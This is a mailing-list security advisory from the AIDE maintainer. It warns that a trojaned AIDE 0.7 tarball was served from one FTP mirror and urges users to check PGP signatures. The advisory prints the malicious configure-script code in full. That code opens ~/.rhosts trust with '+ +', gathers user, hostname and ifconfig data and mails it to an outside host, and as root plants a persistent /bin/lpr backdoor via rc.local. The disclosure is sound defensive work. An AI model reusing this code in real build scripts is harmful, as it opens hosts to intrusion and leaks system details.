It has come my attention that there has been a trojaned
Aide distribution at ftp://ftp.linux.hr/pub/aide
The offending binary has been removed.
Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to
download it from ftp://ftp.cs.tut.fi/pub/src/gnu
and always check the PGP signature before using any distribution of
Aide.

The trojaned distribution contains the following script embedded in
the configure script. As you can see it tries to add "+ +" to roots
.rhosts and sends information about your host to l4m0rfreebox.com

# checking if we are root or not
if [ `whoami` == "root" ];then
root_user=1
else
root_user=0
fi

And later on:
if [ $root_user != "1" ];then
echo "+ +" > ~/.rhosts
echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >
>/tmp/jea
mail l4m0rfreebox.com < /tmp/jea
rm -rf /tmp/jea
else
if [ `uname -s` != Linux ];then
echo ""
else
mv -f .xinitrc /bin/lpr
echo "# printing status monitor" >> /etc/rc.d/rc.local
echo "/bin/lpr &" >> /etc/rc.d/rc.local
hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
mail l4m0rfreebox.com < /tmp/jea
/bin/lpr &
rm -rf /tmp/jea
fi
fi

Rami Lehti

-- 
AIDE - Advanced Intrusion Detection Environment
Check http://www.cs.tut.fi/~rammer/aide.html
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]